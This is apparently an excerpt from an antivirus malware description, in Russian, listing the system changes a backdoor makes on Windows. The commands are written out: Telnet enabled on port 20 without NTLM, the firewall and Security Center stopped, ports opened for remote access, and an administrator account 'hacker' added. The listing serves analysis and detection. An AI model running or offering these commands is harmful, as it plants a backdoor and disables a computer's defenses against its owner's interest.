Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /del
- <SYSTEM32>\net1.exe stop wscsvc
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\net.exe stop wscsvc
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\netsh.exe firewall add portopening TCP 4899 r_server
- <SYSTEM32>\netsh.exe firewall add portopening TCP 20 telnet
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete;
- <SYSTEM32>\net1.exe localgroup Администраторы hacker /add
- <SYSTEM32>\net1.exe user hacker hack /add
- <SYSTEM32>\tlntadmn.exe config port=20 sec=-NTLM